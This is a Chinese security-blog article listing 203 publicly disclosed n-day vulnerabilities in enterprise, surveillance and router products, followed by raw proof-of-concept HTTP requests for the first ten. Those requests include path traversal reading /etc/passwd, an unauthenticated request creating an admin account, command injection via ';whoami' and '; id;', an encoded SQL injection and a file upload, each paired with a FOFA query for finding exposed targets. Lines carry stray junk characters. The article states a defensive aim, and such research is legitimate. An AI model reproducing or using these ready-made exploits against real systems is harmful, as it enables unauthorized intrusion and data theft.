互联网公开漏洞整理202309-202406# g1 v" L6 K; B. `; P! \
道一安全 2024-06-05 07:41 北京. f0 t- L1 Y6 z
以下文章来源于网络安全新视界 ,作者网络安全新视界2 J k G; z7 c+ S# u/ x
# k; {; n$ V: N8 Z
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。, g, p" }5 v" Z+ A
& i, J0 c0 S1 j# n漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。$ m) |+ K8 b! o% @2 D
w# V% y) P7 i0 s& w1 _: B3 j
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
) J# e/ b! @: k5 N. { r1 v0 o# A
* o6 r! l% V& M% g5 {8 c+ d/ y# d文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
0 n3 D, S# \8 d& m2 G3 @
; W" X% j! _9 m8 A$ |. I$ W) z合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
' v* J6 s: k/ e2 x* M+ I5 n
+ a ~$ P2 p o6 K ?7 |/ }( {% Z( w7 u) H1 k/ C4 Y- L) b
声明 w! z) ?8 Q* \( _- A: `
" g9 y g, C+ e* {为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。* j# G3 Q+ P) }' K# c( x3 k2 S
; D1 Y1 R1 J- v3 K5 [. x
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。: c C# Z( C5 M9 R& A
1 \ g; U- w& u0 j
0 P5 M" _+ k; i% }, s
3 z, J w0 k$ \; c( Y' o H目录
0 s5 t# _* o% \6 D) K
+ M, r7 P# B5 A: k' w- X01
7 v$ R/ O; c! p5 X9 ?" r6 N0 g
0 d& G0 r/ \: F2 x1 q6 l$ G+ \1. StarRocks MPP数据库未授权访问
$ o4 p' @3 T" l3 u$ ~( Z) a+ M. q2. Casdoor系统static任意文件读取1 }3 f. y7 f/ a- B
3. EasyCVR智能边缘网关 userlist 信息泄漏
. l. y9 D1 p* T6 o0 I2 W# X1 B; j4. EasyCVR视频管理平台存在任意用户添加
( |1 h% @: s1 h5. NUUO NVR 视频存储管理设备远程命令执行
8 O% ?3 m/ N9 V: I* z6. 深信服 NGAF 任意文件读取+ |- h0 L; {( A
7. 鸿运主动安全监控云平台任意文件下载- O B. X" h/ E6 |+ ^- q: c
8. 斐讯 Phicomm 路由器RCE
/ C3 F7 |* ^' ?# V/ a1 l9. 稻壳CMS keyword 未授权SQL注入
! [6 B/ v9 e+ i/ p! ^+ Z7 ]% z10. 蓝凌EIS智慧协同平台api.aspx任意文件上传$ ]: j0 g. g8 L# u9 l S) Y
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
9 `( g( @# ?* A6 k7 W% E8 G" ]4 H# C8 x12. Jorani < 1.0.2 远程命令执行$ h+ ]/ j0 n F2 e* F
13. 红帆iOffice ioFileDown任意文件读取
$ K M9 Z+ V) {14. 华夏ERP(jshERP)敏感信息泄露8 N9 z! F; \& ~. P
15. 华夏ERP getAllList信息泄露
; \! E' v M( c8 x, n0 P1 I! ]( b16. 红帆HFOffice医微云SQL注入
- y$ F9 z6 G, u% ?' I+ \17. 大华 DSS itcBulletin SQL 注入
' q. V0 a) k j: j5 y# N) O18. 大华 DSS 数字监控系统 user_edit.action 信息泄露) d7 _" Z: l$ j9 m
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入* G+ ]0 M% @8 R; O H( h
20. 大华ICC智能物联综合管理平台任意文件读取
/ d1 ^; I0 }' Y" e# o- y21. 大华ICC智能物联综合管理平台random远程代码执行# E: u& T3 P9 W: q: h2 n3 w7 z- M
22. 大华ICC智能物联综合管理平台 log4j远程代码执行* ^: ?9 ?1 h. R% X
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
. i3 {, o4 D- i F- R24. 用友NC 6.5 accept.jsp任意文件上传: _; m% V; U$ ]
25. 用友NC registerServlet JNDI 远程代码执行
+ }9 H. f* e: U7 [ p1 K" H# n7 c4 b26. 用友NC linkVoucher SQL注入" O* C5 H2 t1 @7 \
27. 用友 NC showcontent SQL注入
& V; [; C& e0 u3 i28. 用友NC grouptemplet 任意文件上传; k8 K" o3 z! P; V) B$ R4 \9 N2 [
29. 用友NC down/bill SQL注入
& ^" T9 Y: Q$ l, Q30. 用友NC importPml SQL注入
1 R3 M# T9 x3 U7 V31. 用友NC runStateServlet SQL注入; ]6 G4 X- d+ W$ i! ]( J! _
32. 用友NC complainbilldetail SQL注入
7 f0 ^2 F& X+ J/ w5 g6 F3 V33. 用友NC downTax/download SQL注入5 b! E/ C3 {" c j6 l* r$ F
34. 用友NC warningDetailInfo接口SQL注入: b8 r4 `0 L: J0 |% N
35. 用友NC-Cloud importhttpscer任意文件上传
" |! f- i# \: k36. 用友NC-Cloud soapFormat XXE
4 _6 L8 i* N+ b. u& u% @. F37. 用友NC-Cloud IUpdateService XXE
: i2 s# q3 Q" E) G' u% `38. 用友U8 Cloud smartweb2.RPC.d XXE
# j; f5 `. q* B. ?9 |39. 用友U8 Cloud RegisterServlet SQL注入" X; X8 F( c8 H X
40. 用友U8-Cloud XChangeServlet XXE* }6 F c2 e9 \" J* t; }
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
* t3 z! c% p, ?* L/ Y$ t42. 用友GRP-U8 SmartUpload01 文件上传7 h6 P( n( _* C+ C* ^3 Y" x
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
6 ]0 J1 `. x# F/ X5 {/ v44. 用友GRP-U8 bx_dj_check.jsp SQL注入
+ N6 \2 k2 a% }45. 用友GRP-U8 ufgovbank XXE# r0 ?* u7 a' P( K
46. 用友GRP-U8 sqcxIndex.jsp SQL注入8 s. ?' b3 n$ h) j" @- T4 u6 x
47. 用友GRP A++Cloud 政府财务云 任意文件读取# N c1 I3 v3 _0 c$ T( n. U4 P6 G
48. 用友U8 CRM swfupload 任意文件上传
% `; W6 _) G' f; u$ z0 ^; U! ~49. 用友U8 CRM系统uploadfile.php接口任意文件上传# G9 l2 P& ^' o$ {. T
50. QDocs Smart School 6.4.1 filterRecords SQL注入
3 N! I$ |6 t- h: Z2 ]51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入" c4 N/ r$ |: Y( x/ a+ B9 ^
52. 泛微E-Office json_common.php sql注入
6 q" c" ^% a% ]53. 迪普 DPTech VPN Service 任意文件上传
1 B# i: U9 l" x) x3 s% Z" E54. 畅捷通T+ getstorewarehousebystore 远程代码执行- @% C. F. ?6 d2 L: Y
55. 畅捷通T+ getdecallusers信息泄露
' _1 Y u; P& I56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE2 z/ |6 _( X7 E1 S3 P/ j
57. 畅捷通T+ keyEdit.aspx SQL注入
# O! Q+ k% a& P: r6 n2 u58. 畅捷通T+ KeyInfoList.aspx sql注入- S6 {4 \( O; S& Z' f. _
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
' b/ @' [0 u: I60. 百卓Smart管理平台 importexport.php SQL注入
6 U1 i; g8 D6 B1 h7 n7 k$ s! {( P$ X61. 浙大恩特客户资源管理系统 fileupload 任意文件上传0 `! B# g o. w w
62. IP-guard WebServer 远程命令执行! e* M3 w" E3 R3 t- L# X8 [* |
63. IP-guard WebServer任意文件读取
+ f- O' a2 }5 l+ d$ c y64. 捷诚管理信息系统CWSFinanceCommon SQL注入
3 \/ n3 s- ~8 K0 Z0 g65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
3 O1 H3 Y- c! Q66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
2 n5 j. X6 g5 O, c1 s67. 万户ezOFFICE wpsservlet任意文件上传
" W2 v/ S4 g- B68. 万户ezOFFICE wf_printnum.jsp SQL注入5 T# ~! K4 |9 Z6 O/ Z; b/ d
69. 万户 ezOFFICE contract_gd.jsp SQL注入
- l7 l/ L- Q" Q6 Z5 U( D0 D5 X70. 万户ezEIP success 命令执行: S5 n$ }% S2 ] c0 D
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入: w: K% W/ @; k1 F
72. 致远OA getAjaxDataServlet XXE8 y1 s1 b; r3 D+ g) c: f
73. GeoServer wms远程代码执行; n! a4 b1 ?$ r& S; T
74. 致远M3-server 6_1sp1 反序列化RCE
) M7 B! v* Q4 K75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE* w" {7 q1 S: V; g- m0 b
76. 新开普掌上校园服务管理平台service.action远程命令执行
2 K# V; N5 ~4 }4 g; x, g77. F22服装管理软件系统UploadHandler.ashx任意文件上传
; F4 s9 w" N5 \. q: R/ t3 N78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传* L8 F1 b& j0 t
79. BYTEVALUE 百为流控路由器远程命令执行
/ e# Z6 m9 \ w$ [5 h0 S, K80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传6 \. E$ F. k5 o; Y `( ?5 a4 ]
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
! {5 R# U# Y: c7 l* R82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
- C+ f* v3 c6 x$ e. B/ A, n83. JeecgBoot testConnection 远程命令执行 n! C, v& n# v; T9 b
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入( x! }0 y6 F0 G8 o! R
85. SysAid On-premise< 23.3.36远程代码执行% r5 z0 _7 ]: g' p/ {) O
86. 日本tosei自助洗衣机RCE
& \. R. U2 j. d" A9 d/ @' C87. 安恒明御安全网关aaa_local_web_preview文件上传7 a, {7 n' f1 N& c% }- [ C
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
( V1 z) z1 v5 s5 Z# j9 h Q89. 致远互联FE协作办公平台editflow_manager存在sql注入
8 U. _7 \4 ^& S3 N- n5 K7 k/ s$ k% d90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行, u8 b" \5 s( P% ^" B3 p% n1 o
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
6 p) y3 M% P4 x92. 海康威视运行管理中心session命令执行
$ G2 g) N' U; ]93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传, c1 S! v' Z/ _0 u j
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传! U! i M9 {1 E5 V0 x/ Z2 Y
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行2 }: q! D7 M* V7 c$ E
96. Apache OFBiz 18.12.11 groovy 远程代码执行
( r; f; y1 G9 x' p: |; E& G7 ^97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行, j' M# m y2 s% b8 L- j; ~
98. SpiderFlow爬虫平台远程命令执行
, m# E9 t, a8 s% F99. Ncast盈可视高清智能录播系统busiFacade RCE
$ a1 W5 d. V1 c/ r( a100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
z- R& p, Z, Z: |101. ivanti policy secure-22.6命令注入
/ P$ C' f3 M! ^' F9 t# C& d102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
( K2 k" s3 e. G103. Ivanti Pulse Connect Secure VPN XXE0 ^* r$ b; L& C$ {) y1 j$ A: j! E3 ^
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
7 I2 g8 R8 B& O9 Y' @$ M105. SpringBlade v3.2.0 export-user SQL 注入
6 e1 C/ `" i0 d- }% q) j106. SpringBlade dict-biz/list SQL 注入' V9 I R' i& }
107. SpringBlade tenant/list SQL 注入9 M8 p& [* g# N- W S
108. D-Tale 3.9.0 SSRF
8 ^( u/ k+ t, D1 [! J+ ], y109. Jenkins CLI 任意文件读取% `2 s$ U+ u+ c/ z3 r% d
110. Goanywhere MFT 未授权创建管理员& W, {7 c0 |" E! C* C: X, q8 k
111. WordPress Plugin HTML5 Video Player SQL注入, Y$ U6 Q* W7 `0 O$ k
112. WordPress Plugin NotificationX SQL 注入
& c$ n; r3 g) y7 i2 I( v113. WordPress Automatic 插件任意文件下载和SSRF$ ~4 q7 Y; e+ ~7 J# Z0 Q
114. WordPress MasterStudy LMS插件 SQL注入2 H2 [3 h2 }# |& `8 d+ x
115. WordPress Bricks Builder <= 1.9.6 RCE) @5 n0 W b; |' B9 V
116. wordpress js-support-ticket文件上传* G) h1 S& \; V. g
117. WordPress LayerSlider插件SQL注入
$ c( |7 x3 h5 p7 O# z3 i# p d7 h118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
$ K6 b7 j+ f. u119. 北京百绰智能S20后台sysmanageajax.php sql注入
9 h' R4 V ~' R6 X( s0 c* i120. 北京百绰智能S40管理平台导入web.php任意文件上传+ u5 e% ~1 ^1 m& N# }; ~4 w
121. 北京百绰智能S42管理平台userattestation.php任意文件上传% z. V% z* a, O* T# L: p3 H
122. 北京百绰智能s200管理平台/importexport.php sql注入" R T/ @; Y/ P3 z
123. Atlassian Confluence 模板注入代码执行# G0 F( ~8 T1 a+ d
124. 湖南建研工程质量检测系统任意文件上传
2 V0 j) u1 j- l5 J( p/ T: _125. ConnectWise ScreenConnect身份验证绕过2 @1 o5 {8 W N" ?" q5 i6 c0 G
126. Aiohttp 路径遍历
1 O: H) a3 ?- l) @# K127. 广联达Linkworks DataExchange.ashx XXE* g m2 ~7 s" m& x. G( ^
128. Adobe ColdFusion 反序列化9 q9 U/ W, `0 @7 ]
129. Adobe ColdFusion 任意文件读取
, q) ?0 Q, r2 Y% R) I/ S7 Q5 T130. Laykefu客服系统任意文件上传
! t& L# e, s* p! k6 B131. Mini-Tmall <=20231017 SQL注入" P3 ~$ H6 @& K: b1 x! Q% H6 I
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
: }6 C, P" u1 r' O, K" D) l133. H5 云商城 file.php 文件上传
P A& E6 E) N1 b3 F0 J3 ^+ f+ r, ]134. 网康NS-ASG应用安全网关index.php sql注入
% n f% L" g8 [" E6 Q; U x7 A135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
6 V: w0 l7 G4 y- R, U6 [136. NextChat cors SSRF! P* \, p5 M$ n
137. 福建科立迅通信指挥调度平台down_file.php sql注入
: U: a, f9 T# j1 X' I; u138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
3 b3 w" L9 K" n) U139. 福建科立讯通信指挥调度平台editemedia.php sql注入7 C# C/ A- D7 T T1 k
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入$ I2 s4 h( {+ L$ d" \
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
! g/ S& e3 i7 G5 q3 A6 h142. CMSV6车辆监控平台系统中存在弱密码7 g6 ]9 h( |5 v* H
143. Netis WF2780 v2.1.40144 远程命令执行
6 [4 j1 W G4 C8 q6 n1 i9 Q* y6 Y144. D-Link nas_sharing.cgi 命令注入
! `( j/ O" G$ |2 P% N. J145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# a' I/ x3 l0 v n y% e
146. MajorDoMo thumb.php 未授权远程代码执行
~- d+ }5 z9 j3 A147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
' }) S/ t1 y. [148. CrushFTP 认证绕过模板注入
$ B8 C2 A3 [0 x149. AJ-Report开源数据大屏存在远程命令执行# b8 ^% N3 q! z/ s0 t
150. AJ-Report 1.4.0 认证绕过与远程代码执行
1 V8 ]3 u" Z) a M; w M6 d151. AJ-Report 1.4.1 pageList sql注入
* k4 E4 I. ]( e4 H* Y0 D/ j7 ?152. Progress Kemp LoadMaster 远程命令执行
) i$ i: G' E. R! Y$ x153. gradio任意文件读取/ m' y7 p7 V' [2 S6 ]' U! u
154. 天维尔消防救援作战调度平台 SQL注入" I; a* p$ l1 r
155. 六零导航页 file.php 任意文件上传
+ ^0 P1 A7 r6 ]- T4 X' V1 W! d% D" I156. TBK DVR-4104/DVR-4216 操作系统命令注入' r0 k5 U8 Q* J5 z" K6 Q/ n5 g
157. 美特CRM upload.jsp 任意文件上传) h' t) ]4 |9 [3 r
158. Mura-CMS-processAsyncObject存在SQL注入6 _$ J7 D4 f: U& M$ l! T9 D/ V
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
( X8 C5 R5 L' S8 `/ M160. Sonatype Nexus Repository 3目录遍历与文件读取
! `9 R1 R. h/ g/ L2 f; Z+ l/ B% _161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传5 l9 T" ^( z* b* ^$ x' j
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传+ G3 W; r S! d( s+ H$ i
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
& ]$ S$ s$ W0 N. a8 \ a* b! B8 A164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
* o% e. U- u: y6 t( a2 r7 i; l y165. OrangeHRM 3.3.3 SQL 注入! k" V; E7 V1 _
166. 中成科信票务管理平台SeatMapHandler SQL注入/ [7 [. _- t; s1 N! v6 Z
167. 精益价值管理系统 DownLoad.aspx任意文件读取
5 o3 S/ P/ ?: U168. 宏景EHR OutputCode 任意文件读取
* \2 a6 b1 V ^# S( T169. 宏景EHR downlawbase SQL注入
3 p6 U; F% w3 t# k. W# ]6 `170. 宏景EHR DisplayExcelCustomReport 任意文件读取* _$ j5 x' j/ X5 u! a) {& \3 }
171. 通天星CMSV6车载定位监控平台 SQL注入% w: r; [* f( I( Q: U' J( X
172. DT-高清车牌识别摄像机任意文件读取
: S# B1 e2 f6 V173. Check Point 安全网关任意文件读取( ]. y' {2 G! c- }9 R
174. 金和OA C6 FileDownLoad.aspx 任意文件读取0 p$ Z( h# p' }( ]: U1 ^' L
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
+ V9 V& N) L# S: B8 g176. 电信网关配置管理系统 rewrite.php 文件上传
4 ^% r& c5 [. X1 S# Z0 n177. H3C路由器敏感信息泄露' T$ P6 e$ q' C* u Z4 q1 T# B. u$ ]
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
# s4 G" h- j. E# e, s$ T1 M179. 建文工程管理系统存在任意文件读取0 V7 F0 l% M& C' }, z. b* J( W
180. 帮管客 CRM jiliyu SQL注入 T2 q- H2 j3 O4 u# N5 R; V2 _+ Y
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
# ~4 J) @' r1 |/ D182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建* Q/ X+ k$ ]+ D1 B' }- y, u/ o
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入% a8 E+ K' v( f* k1 j. x& w
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
0 B6 L2 P" i9 Q' O185. 瑞友天翼应用虚拟化系统SQL注入
; v- A. Y- ?7 u7 r& j" U& H. m5 _186. F-logic DataCube3 SQL注入
; O0 G! F6 j& A! [187. Mura CMS processAsyncObject SQL注入
9 B$ q2 y N( P: e. N188. 叁体-佳会视频会议 attachment 任意文件读取
' W. e& m% i' F# q0 a/ r: Z189. 蓝网科技临床浏览系统 deleteStudy SQL注入
6 {- Z# G6 z6 e' m* I190. 短视频矩阵营销系统 poihuoqu 任意文件读取
4 b. _8 C2 W/ O N" [" ^9 S191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入" |- x: Q6 J4 v5 \8 ~: \1 o
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
8 r3 N: ]4 U" ]" ~193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
9 i' p: M+ b4 b5 a! v9 }194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
, v) C/ `0 N" W195. 飞鱼星上网行为管理系统 send_order.cgi命令执行) F; w8 X1 q8 C9 ~6 A4 r$ f
196. 河南省风速科技统一认证平台密码重置
! K9 z9 v* C' T! e, C% @7 g' c5 k' b$ z197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入0 W3 j9 i8 Q1 f8 G$ k+ K) F
198. 阿里云盘 WebDAV 命令注入
' a" L: r. R2 i2 d199. cockpit系统assetsmanager_upload接口 文件上传
1 u( p5 ]- W( W/ c' \7 ]6 [7 b200. SeaCMS海洋影视管理系统dmku SQL注入 t4 R: B2 J- @, J
201. 方正全媒体新闻采编系统 binary SQL注入
2 Q" f- t. X$ O4 L9 q( o$ j3 Z# e202. 微擎系统 AccountEdit任意文件上传2 O* J* ?* o$ h# U5 ]0 n6 f' A2 D
203. 红海云EHR PtFjk 文件上传9 Q' A- H) K$ ]- O* }
/ r* o. v* ^# V5 f4 `POC列表
$ n4 a, R3 Q1 B: A& v L; l9 }7 L1 L. y* t/ u/ ~+ E
02
$ s K H/ A+ E$ A( e" ~" W
6 A! ~' [* p! J s9 K. c1. StarRocks MPP数据库未授权访问- @" Z3 u7 a! e. {7 \6 a0 q. J A' l* }
FOFA :title="StarRocks"8 z4 @( a% a$ [/ K; t
GET /mem_tracker HTTP/1.1
- M2 x0 N, L7 D1 H- U+ Z0 fHost: URL
7 L* ]9 q( C4 @+ F- c" ^
6 x. F1 \9 |2 s' D# |. c* i
" p6 a# C9 Z3 g) S- r5 P2. Casdoor系统static任意文件读取6 g$ t4 Z3 S- o5 v9 Q' r
FOFA :title="Casdoor"
) d+ } e |8 R: F) k! {. P6 aGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1/ i8 {; h. X# h5 |5 }3 X
Host: xx.xx.xx.xx:9999 d0 t1 j5 h3 f% G) S' z. \/ v7 s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& R, ]3 u% R6 E/ z: @) oConnection: close& S; _0 h; ~3 W
Accept: */*
) W/ I% r* [+ h. ~Accept-Language: en
) s3 X% x* L4 z; zAccept-Encoding: gzip
- C0 ^7 } v- w9 T8 T- \) |6 B) R) [5 F& ^) n& B
) J/ B+ _, a8 {. z& U3. EasyCVR智能边缘网关 userlist 信息泄漏5 j* F. J' [! \* d0 |
FOFA :title="EasyCVR"$ r0 ?8 o2 \; a; Q( x2 D
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.13 v1 w/ i/ t5 x( [: n4 s5 V) w
Host: xx.xx.xx.xx5 B# E0 t, u7 N5 i" g
) U5 ]( z5 {! ]5 }3 K3 q
3 g- I/ H' v) l0 v1 U3 V/ |4 H4. EasyCVR视频管理平台存在任意用户添加
# _: c( H2 ? _ M- o1 m3 OFOFA :title="EasyCVR"
8 [0 R* |1 T8 E# ^ F% U
& a+ g d) _) Lpassword更改为自己的密码md5
. G& v1 u2 i {- N s5 S% {' MPOST /api/v1/adduser HTTP/1.1. t: q0 E* j, m: G7 p" Q0 [( a
Host: your-ip6 t( _' [1 d5 e o: U) a
Content-Type: application/x-www-form-urlencoded; charset=UTF-8- M' ^; e9 _. Q& [
+ X" s4 F. _; y6 n8 v( u# t3 r
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1/ p. E( u+ Y& j; j# s$ W
1 h, a: P' ?* }8 J0 Z# p6 e+ L
: A) O3 c: ^& O5. NUUO NVR 视频存储管理设备远程命令执行* E0 @/ T! X- B% K. @
FOFA:title="Network Video Recorder Login"
) C. J( M4 J ^1 s. Y" {) N7 F# @GET /__debugging_center_utils___.php?log=;whoami HTTP/1.11 ^2 y9 \2 N% X# G/ _$ g
Host: xx.xx.xx.xx4 t; I9 L9 @' S: i: n2 B x2 I
: p' m8 b) Q6 A! G0 [( s
8 R% t. a9 z) u6. 深信服 NGAF 任意文件读取# ~: m4 K% e/ }% v: t* e1 E8 f. E
FOFA:title="SANGFOR | NGAF") G* E! W" f. F
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
. U; N# i* h: Y/ b2 S: ?Host:
9 J2 \0 o. n! H0 i5 v3 E) K' T2 k A0 C5 f; s; l* ?
% } U g) u0 w# t
7. 鸿运主动安全监控云平台任意文件下载 E& _' Y" S" ?+ N: P# N4 N
FOFA:body="./open/webApi.html"
" B- e; v# I% bGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
+ c! ?* ^0 n' h/ ~+ @8 h6 VHost:! W4 I) l7 g0 n6 H$ F) Y- M' x* K
5 B1 M s2 p' A& s8 s( x$ E8 s
% j. O) G! R5 o* D7 `( r3 _ O5 P2 r: A8. 斐讯 Phicomm 路由器RCE+ I S! U5 O+ s3 X, i* o" E
FOFA:icon_hash="-1344736688"
D! S: \- x& ~# q/ i7 v0 `默认账号admin登录后台后,执行操作
5 ?0 o7 U' O' `) MPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.10 c4 Y8 T3 l/ C1 R
Host: x.x.x.x
9 C4 G) e, } \, cCookie: sysauth=第一步登录获取的cookie! |; G0 o! r5 K4 R5 D4 P) O5 m& O7 v2 X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
5 J2 R3 Z& e Y. a1 [ L' K- BUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36' j; Z" R6 S' V! z
, s& _" S! C& |' K- ^- }: x1 R; Y6 f
------WebKitFormBoundaryxbgjoytz! m7 [$ C5 T1 A
Content-Disposition: form-data; name="wifiRebootEnablestatus"
, d2 D) c9 U9 y4 a+ Q. T% I/ N+ d) }9 q) l
%s
) ~8 \+ `: H5 x" s------WebKitFormBoundaryxbgjoytz4 I; Y! T# c& n
Content-Disposition: form-data; name="wifiRebootrange"7 d5 j' \7 u: r1 Q, f' N. E
4 ]5 N7 `# g& I, L# D- g. {; D0 h
12:00; id;
' _/ r; Y: z0 g' t8 K% p% e+ ]------WebKitFormBoundaryxbgjoytz1 L8 h, v! K0 R1 z6 g) L! n
Content-Disposition: form-data; name="wifiRebootendrange"2 J+ M- B! Z3 _% E
. M5 H, b; ^, R1 ]' ?; G%s:- S. E. I3 {" `
------WebKitFormBoundaryxbgjoytz( y f1 x P. g5 T
Content-Disposition: form-data; name="cururl2"
8 C9 X; O& Q- }; z2 W/ p" M! o p; Q) Z; d
# I' F: c& L( {( f- I
------WebKitFormBoundaryxbgjoytz--
. Y3 \* O: P+ h0 c) ~3 Q, O! x0 x1 I# P$ C3 I$ `" T
+ N6 A; r: U6 Z9 c
9. 稻壳CMS keyword 未授权SQL注入
9 |# t5 e% j8 G8 w% Y& Z$ s0 B5 RFOFA:app="Doccms"0 h0 m7 n- J$ a7 N+ l3 P8 I( ?
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
( u& i3 l+ |6 T! l# fHost: x.x.x.x
. K2 L! b/ ^' k2 B- @! N5 o' L0 b! d9 I4 B2 c8 X9 M% A
2 s7 T+ W _, N1 K, W
payload为下列语句的二次Url编码
' c; R/ l- h; y+ y4 O! i
, S2 S( x2 H8 i$ x. S' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
+ t- {" z ?4 j& M2 C( |& Q0 m5 T) t' j( f F2 p4 |: M6 V
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
( t9 u0 [! t; \: Z" t6 B; OFOFA:icon_hash="953405444"$ \* H& Z8 \0 f0 B7 `1 {# Z
+ g) W3 N6 }5 ]% \文件上传后响应中包含上传文件的路径
! h6 z# M2 N: E7 @: {POST /eis/service/api.aspx?action=saveImg HTTP/1.10 S3 ^ M/ n" [6 e- g1 C
Host: x.x.x.x:xx
& }1 s) y- t0 Y* U+ h' E$ rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
# Q9 C1 v) W. e' |- ~$ g& MContent-Length: 197
2 h2 q8 U9 I6 x% OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
/ ~1 W' E3 w/ U E# K0 _7 XAccept-Encoding: gzip, deflate
3 G4 a4 U1 K- z/ ^' qAccept-Language: zh-CN,zh;q=0.9. Z9 v/ A ]! |% n# y7 h$ j
Connection: close
S6 T+ j- i3 @ i" W2 cContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
5 b* m$ f& q7 `5 j3 v# S2 T6 p1 M2 ?
------WebKitFormBoundaryxdgaqmqu# L5 |5 k( k6 @
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
; N& L$ \. i: a" _$ I7 \- IContent-Type: text/html0 E: o( u) D0 b- _4 t
q8 m% s6 f/ Y2 F6 W+ ?* I. d
jmnqjfdsupxgfidopeixbgsxbf
) C0 E: @) N/ }3 w7 d1 c) Q& q------WebKitFormBoundaryxdgaqmqu--
& h1 F3 [" i! c: L* `
. x7 M5 G7 W0 K0 }7 _ c& ~: _9 G0 f, E
